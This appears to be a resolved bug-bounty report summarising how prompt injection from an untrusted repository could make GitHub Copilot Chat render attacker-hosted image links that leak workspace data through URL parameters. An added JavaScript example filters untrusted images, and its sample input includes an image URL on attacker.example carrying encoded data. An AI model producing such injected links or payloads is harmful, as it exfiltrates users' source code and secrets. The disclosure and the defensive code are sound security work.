Source Code and data exfiltration via GitHub Copilot
Team Summary
Official summary from GitHub
Due to insecure output handling in Copilot client interfaces, a prompt-injection-initiated attack was able to result in data exfiltration in a number of ways. A user that was prompt injected, by running Copilot Chat in a specific manner on an untrusted repository, could have generated arbitrary image links pointing to an attacker-controlled domain that would be rendered in the Copilot Chat interface, allowing for data exfiltration via URL parameters. This attack could potentially have allowed a compromised Copilot session (Copilot Chat being called on a malicious cloned local repository) to exfiltrate the contents of the same workspace to the malicious domain. Another risky behavior that was also noted was that links could be created to attacker-controlled domains via Copilot, which would not be immediately apparent to end users, causing another avenue for data exfiltration which required more user interaction, lowering the severity. This vulnerability was addressed by only rendering images from trusted domains, and by adding interstitial modals to let users know where links pointed. GitHub also hardened the rendering specification for all Copilot clients to ensure that the context provided to Copilot is made more apparent to end users to mitigate the impact of unseen content affecting the output of Copilot.
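The two mitigations named in the summary (images rendered only from trusted domains, link destinations surfaced for an interstitial) can be sketched as a filter over model-generated Markdown. This is an added example, not GitHub's code; the allowlist host, function names and sample text are assumptions constructed for illustration.

```javascript
// Added example. TRUSTED_IMAGE_HOSTS and every sample value are constructed assumptions.
const TRUSTED_IMAGE_HOSTS = new Set(["trusted-images.example"]);

// True only for https URLs whose exact hostname is on the allowlist.
function isTrustedImageUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return false; // relative or malformed URLs are not fetched
  }
  if (url.protocol !== "https:") return false;
  if (url.username || url.password) return false; // rejects trusted@other-host forms
  return TRUSTED_IMAGE_HOSTS.has(url.hostname); // exact match, no suffix matching
}

// Inline Markdown image: ![alt](url "optional title")
const IMAGE_RE = /!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)/g;
// Inline Markdown link that is not an image: [text](url)
const LINK_RE = /(?<!!)\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)/g;

function sanitizeModelMarkdown(markdown) {
  const blockedImages = [];
  const linksNeedingConfirmation = [];
  // Untrusted images become inert text, so rendering never issues the request.
  const out = markdown.replace(IMAGE_RE, (match, alt, url) => {
    if (isTrustedImageUrl(url)) return match;
    blockedImages.push(url);
    return `[image blocked: ${alt || "untitled"}]`;
  });
  // Links stay in place; their real hosts are collected so the UI can show
  // an interstitial naming the destination before navigating.
  for (const [, text, url] of out.matchAll(LINK_RE)) {
    try {
      linksNeedingConfirmation.push({ text, host: new URL(url).hostname });
    } catch {
      // relative link: stays inside the client, nothing to confirm
    }
  }
  return { markdown: out, blockedImages, linksNeedingConfirmation };
}

// Constructed model output: one untrusted image, one trusted image, one link.
const sample =
  "Done. ![status](https://attacker.example/p.png?d=QUJD) " +
  "![logo](https://trusted-images.example/logo.png) [docs](https://attacker.example/docs)";
console.log(sanitizeModelMarkdown(sample));
```

The regexes cover inline Markdown syntax only; a production client would apply the same host check where its renderer resolves image nodes, so that reference-style images and raw HTML pass through the same gate.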
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Code Injection